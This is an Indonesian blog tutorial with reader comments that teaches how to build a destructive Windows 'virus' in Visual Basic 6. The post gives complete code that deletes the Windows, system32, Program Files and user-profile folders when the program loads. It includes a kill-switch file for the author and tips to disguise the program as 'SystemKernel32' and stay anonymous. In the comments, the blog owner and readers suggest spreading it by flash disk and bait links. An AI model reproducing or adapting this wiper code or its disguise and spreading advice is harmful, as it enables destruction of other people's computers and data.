jump to navigation

Bikin Virus Kejam Tanpa Terdeteksi Antivirus 21/06/2007

Posted by oasisnet in Cara Bikin Virus, Tip's n Trik's Windows, Tutorial Internet.
trackback

 

Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple gt

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

—- more —-

Tutorial Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…

Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…

4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain

5. Jangan pernah naroh nama lu di nih virus… k?

6. compile deh… slese!

Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.

Reff : http://neolisense.wordpress.com/

Comments»

1. randi - 23/06/2007

tolong kirimkan script virus ke E-Mail saya
Please karena saya tertarik untuk membuat virus

2. yudi - 24/06/2007

Thank yach.. dah nnjkin aq gmna bikin vrus. trus komponen apa aja yang di butuhkan….???

3. Kikiro - 13/07/2007

Wah thx yah,,saiia masih sma,,lagi pngin blajar virus,,,hehehehhe,,,,
Thx alot

4. dewangga - 18/07/2007

mas pasword nya VB_ViMaker32_RC_03 giman cara carinya?
kok akuu coba buka web site nya gak da c?

5. oasisnet - 19/07/2007

ada coba saudara baca pada bagian license Agreement sampai habis disana ada tu Passwordnya

6. Andika - 20/07/2007

gimana kalo pake pascal atau assembler bisa ga bikin virus simple kayak gitu
please balas yagh di email gw

7. oasisnet - 21/07/2007

bisa koq asal kita tahu cara kerja nya yang penting…
tp umumnya orang lebih banyak bikin di VB loh soalny alebih simpel loh mas ….

8. dewangga - 22/07/2007

mas gimana cara nyaa dapat VB(optimal : 6.0) full version aku cari di paman google kok gak daachh yaaaa susahh bgt carii nyaaa!!!! pliiesss kasih tauu diaman akau cari nyaaa??????? thankzzz

9. dewangga - 22/07/2007

satu lagimasss giman caraaa nyebarin virus nyaaa, kloo kita buat virus dariii VB Vimaker 32 kayakk nya lemahh bgt dechhh tuh virusss masakk di hapuus aja udach hilang n gak fungsi lagiii…;));))
plisss asih tau cara nyaa nyebarin virus yang dach aku buat!!!!!

10. oasisnet - 23/07/2007

nybarinnya pakai flasdisk aja atau disket bisa kok, kalau mudah dihapus berarti settingan waktu awal kita bikin tu virus di VB nya tp ada lag yang bagus pakai Visual Basic yang terbaru tu lebih ampuh lagi virusnya. tp kita harus ngerti bahasa program loh. kalao VB 6.0 aku gak punya nih tp. coba aja cari di (www.ddl2.com, http://www.phazeddl.com) atau program download lainnya.

11. harris tanjung - 23/07/2007

mas krimin donk software bikin virusnya.and bahasa yang mudah dimengerti. baru blajar mas:D

12. oasisnet - 24/07/2007

mas harris semua yang diminta ada dibagian download dstu bisa download tp matikan dulu program antivirusnya

sedangkan tutornya ada juga loh..

selamat mencoba semoga berhasil ya..

13. P Edy - 24/07/2007

Udah hebat sekarang yo hen, lah punya situs pula

14. oasisnet - 25/07/2007

makasi Pak Edy, kita hanya menyalurkan bakat untuk memajukan ilmu IT yang lagi berkembang pesat nih pak….😀

thank’s atas dukungan dan masukannya …

15. cupunk - 08/08/2007

mas itu yang buat antiviruse kok gak bisa?? aku dah coba persis gitu, tapi pasti kata “FileExist” e salah. tolong di cek lagi.. bales di email-ku ya pleasee!!!!!!!!!aku tunggu!!
cupunk_neverland@yahoo.com

16. rons - 09/08/2007

kelihatannya simple, tp blm gw coba….

17. spam killer - 10/08/2007

mang.. passwortnya vb+maker apaan sih

18. j3 - 13/08/2007

tolong dong kirimin ke e-mail saya juga tentang virus mematikan itu, atas semuanya say ucapkan trimakasih

19. tea - 15/08/2007

saya ingin bikin virus tapi cara penyebarannya lewat fs atau setiap buka web tertentu, gimana yah caranya???? coz hampir seluruh remaja indonesia punya fs. so gw pengen bagi-bagi viris kepada setiap yang nge-add gw. kasih tau caranya dong!!! ntar lo gw panggil hecker sejati deh wkakakakakakaka!!!!!!

20. Venus The CyberVirus - 19/08/2007

Wekekekekek

Masih Aja Bikin Virus Begituan ^_^

21. Asep suryadi - 20/08/2007

Tolong dong kasi Cd keynua please (VBMaker) and tolonh kirim ke email ku ;;;;;;;;;

22. lfay - 29/08/2007

dah banya WORM-VIRUS-an yang uE SeBar,KebanYakan maen DiRegistry Windows(9x-XP) sama File MS Office..
bisa saja uE program HancUrIn OS/NgedeletE-nya..[-red]

da YanG TerTaRik??ajarin buat antinya donk!!
om, mas pak,

23. Lanjar - 31/08/2007

mas pintar amat sih, yang linya dong yang ada gambar animasi gitu loch biar terkenal virusnya.

24. fucking_women_betray - 08/09/2007

hiii salam kenal yaa oya tolong dnk kasi tau scrip wat bikin virus yg bisa gerusak jaringan internet ma power supfly nya kirimin ke e-mail saya dnk bank plseeeeeee!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! makasi bnyak yaa bank

25. Sanji - 08/09/2007

mas mas, ajarin bikin virus pakai java dong…

26. orang cupu...... - 11/09/2007

emg g ada virus yg cara kerjanya lebih unik, aneh n menyakitkan …
masa cuma ngapus data aja….
ada g ya virus yg dampaknya “menghalangi semua input yg akan masuk, baik secara langsung maupun tdk langsung”….
jadi komputernya hrs di jual deh or di buang aja kali ya…

27. Ridwan - 11/09/2007

bgus bngt, da yang lain gak? mas mang sebenernya orang mana, klo leh tau hehehhehe…….., o y mas klo Visual basic + Vimaker tu maksudnya apa mas?

28. nimpul - 14/09/2007

aq juga mau tu bljr bqn virus..
pake java, ada to..
Minta ya.

29. dora - 18/09/2007

gue mo blajar bikin virus cuma gak mau nyebarin hanya akan aku gunakan tuk hancurkan data pcku dengan tempo 3 hari ada yang bisa bantu gak soalnya aku mau pindah kost dan pc dipake bareng 2x ada yang bisa bantu gak ???? please deh yang sederhana aja pake vb ato apa aja yang jelas mudah

30. amir - 18/09/2007

tolong kirimkumpulan skrip virus ke email saya—plus kumpulan skrip antivirusnya….coz saya tertarik dngan artikel yagn anda buat,,, thx

31. valenttt - 21/09/2007

minta kirimin script virus donk

32. yahya - 25/09/2007

HE Coy kalo virus yang nggak bisa dihilangkan ada apa nggak??
(abadi dikomputer}

33. No Name - 01/10/2007

Ada yang mau ga script virus Brontok (gabungan brontok A,B,C)sorry,aku cuma bikin scriptnya doang tapia aku ga akan sebarin dan aku bikinya pake VB6 Ada yang mau

34. BartIQY - 02/10/2007

hay saya tertarik banget dengn about virus, klu bisa kirimin dong totorial virus yang telah di commpress pk Winzip

35. bandi - 05/10/2007

ehh,,,tlg jelasin donk,,,kode mana yang warna biru ma kode yang merah,,,gak ngerti,,,please,,,,,,

36. bandi - 05/10/2007

tlg jelasin donk mana kode yang warna merah ma kode yang warna biru,,,gak ngerti nie,,,tapi udh di coba cma ngapus beberapa nya aja,,,tapi gak ngapus windows nya

37. Erin - 05/10/2007
38. Erin - 05/10/2007

^^ Program tuk bikin virus vbs

39. ary - 08/10/2007

bagi siapapun yang mau nnjkin cara2 bikin virus aku mohon pencerahanya coz aku msh ecek2 tentang virus

40. no name - 15/10/2007

eh tolong donk minta script virus yang bisa nyebar di fs

41. Luv - 24/10/2007

mas gimana sih cara kerjanya anti virus tuw ? ? ?
aq ada tgs nech . . . .
tolong yach . . ..

42. VniCK - 01/11/2007

kk,,,pas aku ngoba klr error msg,,,orrornya pada form load,,,,
errornya disini,,,
Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End

mohon bantuangnya

43. sisilia angle - 02/11/2007

kk sekalian aku pengen sekali bikin virus yang ganasnya minta ampun……
tp aku pikir2 belajar dari dasar aja deh….
kk sekalian tolong kirimin software VBnya donk!!! Bagi Yang ada?!!!!!
kirimkan ke email aku yach kk!!!!!

thanx sebelumnya….

44. fajar - 04/11/2007

mas bagaimana bikin virus yang membawa lebih dari satu virus

45. candro - 08/11/2007

mas kasih tau donk gmn caranya bikin virus melalui vb. alnya aq msh pemula, prnh sech bljr vb tp bkn ciptain virus. Tp buat progam lain, mis program kurs mata uang. Nah ksh tau donk cara buatnya satuuu… aja. Aq pgn bljr lbh bnyk biar ga ketinggalan teknologi. Kirim ke email aq ya mas… komplit ama bahasanya dan cara kerja virusnya. Ok mas. Please…

46. agung - 23/11/2007

mas minta tolong dong bri tau bikin virus yg lumayan mujarab…..kalo bisa ama anti virusnya….
kalo boleh smuanya…..
kirim aja ke email ku

47. baron - 05/02/2008

kirim program virus \ke email saya coz saya tertarikbgt bikin virus

48. liza - 06/02/2008

aaaaaaaaaaaaaaaa

49. imaru - 12/02/2008

mas passwordnya tolong kirimin di email ku.
yaaaa……
makasih…

50. Org sabar - 21/02/2008

itu virus di atas cara test berasil na gmana??
klo nyoba di kompi sndiri gmana??
Ancur donk…???

51. aan - 18/03/2008

mas tolong kirim tutorial nyang paling gampang n simpel bikin virus sklian cara ngetest virus, maklum lagi b’lajar nih…, kirim ke email ku. makasih……….sblmnya.

52. andy - 26/03/2008

minta scrip buat virus di vb dwong mas…..

kirimin ke e-mail saya ya…

53. satria - 03/04/2008

ku ra ngerti cara down load progarame mas jawab mas hidup mate ku iki

54. satria - 03/04/2008

kasih tu yaw

55. ansa - 10/04/2008

ok

56. rico - 17/04/2008

aq jga tertarik lo mas klu bhs masalah program kayk gni ni………!!!apalagi klau buat virus…wah malh tu hobi aq.Tp aq msh ksulitan dan gak bsa buat skrip yang dmna virus tersebut gak bsa menggandakan dirinya sendiri kalau tan\pa diperintah oleh sang user,ya….misalnx di klik gtu….la pingin aq tu pingin buat skrip dmana skrip tersebut bsa menggandakan dirinya sendiri dengan bantuan timing/waktu gtu…..stiap berapa detik sekali atu berapa menit sekali tu virus bsa beranak gtu lo mas…….tolong ya mas bikinin skrip yang kayak gtu….sbelumnya makasih ya…atas smuanya….

57. heru - 29/04/2008

saya mau nanya ni…….

cara bikin project yang udah jadi trus saya bikin jadi sebuah software atau dibuka di tempat lain selain di vb……

tolong kirim k e-mai saya ya…..please.

58. ades - 30/04/2008

minta donk script virus x-fly????? klw bisa krim ke e-mail gw yeee!!!
piss slam persahabatan……….

59. itsnain (BANGKALAN) - 12/05/2008

halo trima kasih triknya …………………..gimana jika note pad kita udah gak diaktifkan tapi jika pakek anti vrus buata saya malah bisa kebuka kalau udah di scand nama antivus tu :Kill virus…!!!!Jadi gimana jaan keluarya!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

60. save - 13/05/2008

w heker d mataram w mau nanya bz gk worm d nikahin ma trojan?

61. save - 13/05/2008

oh ya gmn cara tingkatin infra sonic lwt hp?

62. save - 13/05/2008

cz ada isu sms merah nto?

63. Ucok - 23/05/2008

bos gue pengen blajar lebih coal viruzzz ne… perlu bantuan neeee…..

64. Ucok - 23/05/2008

oyi lupa….. matur nuwuuun.. eh bosss gue nyodarain bluefantasi ama batam hacker kok gak jadi…… gimana bosssssss….. blitar butuh jacker bossssss…matur nuwuuunnn…

65. trevis - 27/05/2008

tolong kirim script ke emailku dong, aku maw belajar membuat virus lebih dalam. thanks 4 the all

66. wiro 212 - 27/05/2008

Hhhhh kenapa ga sekalian aja bikin virus buat menhapus c:\????
hayoooo monggo kangmas di pikirkan lagi…kan sekalian ngerusak bung kompi…hehehehe canda just in my imagine>>don’t try this at home

67. oasisnet - 27/05/2008

boleh-2 aja tp bagus nya bang ucok cari tutor nya di internet biar lebih mantap lgi virus nya

68. comeng - 29/05/2008

wah…………..keren bamgrt

69. jenar style - 30/05/2008

wuuihh keren deh bisa bikin terminator buat hard disk

70. rakha - 02/06/2008

tolong kirimin vb(optimal:6.0)ke email saya!!!!!!!!!thaks

71. k4L4_53N74 - 04/06/2008

MAS, TLONG KIRIMKAN SCRIP VIRUS PAKE NOTEPAD KE EMAIL AQ. KAYAKNYA ASIK BUAT VIRUS, KRN BISA KOMPTR ORAG HANCUR……HA………………………………

72. virdayasa - 11/06/2008

mas saya bisa minta tolong kirimin scriptnya???
coz saya msh mo bljr2 gitu……
mksh y mas……
nech email saya tony_djavu@yahoo.com

73. sukimen - 17/06/2008

gwe blom bsa download nich

74. fandi - 18/06/2008

dosa itu

75. riskie04 - 27/06/2008

kl virus ini d edit2 mlh jd anti virus bs ga ?

76. boker - 12/07/2008

temen kirim aku skrip virus n anti virx

77. oasisnet - 22/07/2008

coba ada mas riskie04 mana tau bisa😀

78. ipunk - 22/07/2008

mas tolongin saya donk,saya pengen jadi pahlawan penghacur virus.kirimin lwt e mail ya.saya ipunk di bandung

79. wirat - 23/07/2008

MAS, TLONG KIRIMKAN SCRIP VIRUS PAKE NOTEPAD KE EMAIL AQ. KAYAKNYA ASIK BUAT VIRUS, KRN BISA KOMPTR ORAG HANCUR……HA………………………………

80. heri - 06/08/2008

gw dah dapet nih vb maker tapio gw bingugn gimana makenya
tolong dong ajarin gw gimana makenya klao ga i-male gw aja di jo_anak354@yahoo.com

81. Agdi_cool - 13/08/2008

Boz, aku mw tnya :
1. Apa source code virus atau program dri .vbs bs d jalankan dgn vb?
2. Bagaimana supaya worm atau virus bs ttp g bs k hapus wlaupun nyata2 telah d hapus tp ttp ada lg ktika d refresh (ex: raider.vbs)
3. Thx 4 VM

82. Dr.No - 18/08/2008

merusak sistem, merusak sistem,…..
Windows atuh. linuxnya kagak bisa.
Aku seneng banget ngejahilin system komputer apapun yang berbasis windows.
I’m maniac.
Thanx.

83. copy paste - 25/08/2008

wooooooooooooooooooooooooooyyyyyyyyyyyyyyyy……
yg bginian mah jgn di ajarain atuh bahaya………….

84. imelda - 25/08/2008

oke mas gua coba karang yachhh!!!

85. imelda - 25/08/2008

mas , kasih gua script virus yang isa buat melda jd org kejam ya?? ni alamat FS dan Email melda…cinta_imelda@yahoo.com

86. nandi - 03/09/2008

ga ada lagi yang lbih ganas….??? kalo cma segitu sih mudah banget di delet

87. nandi - 03/09/2008

bisa ga bikin virs pke poto yang ga bisa ilang di layar monitor n merusak sistem.
kalo loe ga bisa berarti loe belum ada apa apanya n masih butuh belajar.

88. budi - 10/09/2008

mas aku gak ngerti2 tu bikin program
gimana sich biar pinter kayak mas gitu

89. martininanang - 19/09/2008

mas gimana cara nyaa dapat VB(optimal : 6.0) full version aku cari di paman google kok gak daachh yaaaa susahh bgt carii nyaaa!!!! pliiess

90. henry - 28/10/2008

WAH BOLEH COBA TUCH. mAS blh ga script virusnya,buat coba2.please kirim ke email aku: henry_rocket2001@yahoo.com

91. gokil - 10/11/2008

kenapa saya coba untuk bikin belum berhasil apakah ada kesalahan,,,,?dan apa yang di maksud dengan form…..?

92. Jani - 15/11/2008

Sob, bagi2 cara praktis bikin virus.
Yg di regedit aja sob, gmn. . . ?

lu kirim ke email gw ya sob. . . ! Qey. . . !

93. ian kasela - 16/11/2008

bos q mta source kodenya virus make ntepat dong krm ya

94. cozz - 02/12/2008

aduh … saya orang design grapich tapi saya tidak tahu cara atasin virus … apa lagi ada baru masuk virus yang bisa ngejebol Deepfrezee saya … terus gimana cara manual untuk hilangin virus itu …. efek virus itu tidak mengganggu kompi saya … tapi dia membebaskan virus virus lain bisa masuk ke kompie aku ….

Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple gt

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

oya cara masuk kesini gimana ( VB Maksudnya) :

Tutorial Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

oya apa ini kode VB Nya :

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

95. AkatSUKI Blu3 - 05/12/2008

Klo mo nyebarin ntu virus bikin adja link yg tulisannya menarik di web u misal BungaCitraLestarBugil.Jpg gitu😛

96. rene - 04/01/2009

om….
kirim dong source codenya ke email aku ya

97. ANDRIK PURNOMO - 04/01/2009

mATUR SUWON ALIAS TRIMAKASIH MAS AKU TELAH TAU SEDIKIT MENGENAI VIRUS OCE .

98. maulana - 24/06/2009

tolong kirimkan script virus ke E-Mail saya
Please karena saya tertarik untuk membuat virus

99. ujuanel - 30/06/2009

Wah, gila ini kode bisa-bisanya orang kode ini tapi jangan di pake ga benar lho entar dosa . ha 2000x
gue, anggota baru

100. ujuanel - 01/07/2009

salam sahabat bro, gue anak bru dari situs ini, baca2 kayanya menarik juga buat antiviru nggak ke detek ama antivir kalau bisa goe pengen yang gila lagi yng bisan ngancurin komputer, tolng kirm ke e-mail aku ya sobat http://www.ujuanel_9191@yahoo.co.id wsl sahabat baru

101. revay.r - 06/04/2010

wahhhhhhhhhh sippp
w dah bsa boos
tapi comp w jga kena nehhhhh
gmn cra ilanginnya

102. reo - 19/04/2010

gan tolong kirim scrip yang lebih lengkap ke Bgaloeng@gmail.com
di tunggu ya gan,,,
ne mw bljar buat virus…

103. wildan - 06/06/2010

tolong kirimin cara yang lebih ditail lagi dan mudah di megerti
saya tertarik bwt bikin firus kirimin ja ke FB saya
pleez…..?

104. ull - 27/07/2010

kasi tw say dung cara buat anti virus yg sederhana ja
lo ada yg tw kirim ke e-mail saya ya
mohon bantuannya ya kaka

105. ulla - 27/07/2010

tombol VB tu pa ya
so q g ngerti
ni baru mau bljr buat vorus

106. bodrex - 14/08/2010

maaf bang mo nanya nihc…
Q pengen bikin Virus, tp g berbahaya n g trdeteksi ma anti Virus…
Cuman isinya pesan tao Tulisan tao gambar gtu gmna bang ????
kirim ke Email saya ya…

107. roman hsb - 15/08/2010

CianG nBRo…

TolOng Dunk KriM Cara BiKIn ViruS NA..

Karn Que TerTArik BiKIn Virus…

kIRIm KE eMAIL qUE..

108. roman hsb - 15/08/2010

CianG BRo…

Kirim Dunk TrikZ BikiN virus NA Ke EmaiL Que…

krn que trtarik bikin virus…

109. alivea - 23/04/2011

ok tak coba besuk!

110. Nheyda Ajha - 03/07/2011

mas bisa ajarin aku lebih detail g??? coz aku pengen sekali bikin virus,tp aq kurng ngerti gmana carax…
bisa kirimin ke email aq g???
qu tunggu y……..


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: